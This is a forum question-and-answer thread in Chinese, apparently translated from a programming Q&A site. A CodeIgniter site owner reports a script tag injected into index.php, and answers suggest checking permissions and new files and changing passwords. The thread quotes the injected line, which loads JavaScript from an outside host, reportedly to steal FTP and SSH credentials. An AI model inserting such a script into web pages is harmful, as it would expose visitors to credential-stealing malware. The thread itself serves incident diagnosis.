我的网站有问题。我不知道为什么index.php插入下面的脚本。这个index.php是codeigniter的一部分,这是我目前使用的框架。是通过访问ftp还是通过代码插入的。删除此脚本后,我注意到在浏览器的左下角有另一个URL被读取。我不知道如何追踪这个,因为我试图找到这个网址,但我看不到它。请帮帮我
我两次遇到这种情况。
任何建议都会非常感激。
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
答案 0 :(得分:1)
您的网站可能已遭到攻击者的攻击。如果您有任何可写入的文件夹(检查您的文件夹权限),就会发生这种情况。还要检查之前不存在的新文件(它们可以被命名为任何内容,并且可以位于站点根文件夹中的任何文件夹中)。
有关类似攻击的更多信息,请参阅:
http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html
和
http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647
答案 1 :(得分:0)
嘿伙计们,我在这里得到了一些信息:http://www.everythingilike.com/roundstorm-ftp-hack-solution
基本上js hack会插入一个执行的java应用程序。这个java应用程序扫描您的FTP信息甚至任何Shell / SSH登录信息。我建议在清理后更改所有密码。